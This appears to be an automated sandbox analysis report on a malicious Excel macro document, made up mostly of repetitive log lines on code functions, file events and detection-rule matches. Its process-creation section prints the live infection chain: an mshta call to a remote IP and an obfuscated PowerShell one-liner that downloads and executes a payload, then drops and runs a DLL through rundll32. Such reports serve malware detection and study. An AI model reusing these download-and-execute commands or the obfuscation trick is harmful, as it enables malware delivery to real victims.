                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060E243
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061129C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060C309
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061D3C8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061C38F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061B391
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0062146E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061A429
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061542E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060B41A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006164F1
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006044FA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006204DE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006174DD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006104B8
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061E498
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00613512
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006145CD
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060F58F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00623672
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00608650
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061363D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061561F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060777B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00612753
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060472E
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00620867
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00616864
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060E86A
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060C850
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060B821
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00611831
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00602830
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006088F4
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006068DE
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00610946
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060194C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00601950
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060F93D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_006199AA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00621993
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00609A7D
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060CA43
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00606A1F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060AB66
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00621B54
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00614B56
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00612BF6
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00617BCA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00607B82
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00606C29
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0061CC89
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00618D71
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00613D41
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00620D5B
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00610D33
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_0060FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_00608D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00602FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00603FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00601F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002ABE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002970ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00299700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00298D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00292830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00299A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A5040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00298650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002ACC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002944FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A64F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002988F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B04DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002968DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A0D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AFF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A8D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A3D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A0946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00291950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A2753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AA156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A4B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A99AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00292FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A41A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00293FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AC38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00297B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A9186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00291F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B1993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A45CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00285CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00279700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00272830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00281831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0029146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00286864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00290867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00279A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00293672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00285040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00278650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002770ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002744FA
Source: 36E8.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe | Process Stats: CPU usage > 98%
Source: DOCUMENT_2801.xls | Macro extractor: Sheet name: Macro3
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0029C67D DeleteService,
Source: DOCUMENT_2801.xls, type: SAMPLE | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED | Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Hzcvqvi\
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 100359C1 appears 46 times
Source: DOCUMENT_2801.xls | OLE indicator, VBA macros: true
Source: DOCUMENT_2801.xls.0.dr | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@25/9@1/35
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: DOCUMENT_2801.xls | OLE indicator, Workbook stream: true
Source: DOCUMENT_2801.xls.0.dr | OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
Source: DOCUMENT_2801.xls | ReversingLabs: Detection: 16%
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD509.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 17_2_00343C3B CreateToolhelp32Snapshot,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: 36E8.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\System32\mshta.exe | Code function: 6_3_034D08CB push 8B490315h; iretd
Source: C:\Windows\System32\mshta.exe | Code function: 6_3_034D00C1 push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D08CB push 8B490315h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 6_3_034D00C1 push 8B490315h; iretd
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260A21 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260655 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF002620D0 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF002623DD push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00261B30 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260002 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF00260000 push eax; ret
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FF0026009A push eax; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002B15F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_008109F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0081054C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0073114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_007315F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006015F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002915F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002715F5 push cs; retf
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0034114C push ds; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: Milossd.dll.8.drStatic PE information: real checksum: 0x8f55d should be: 0x8973e
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Milossd.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
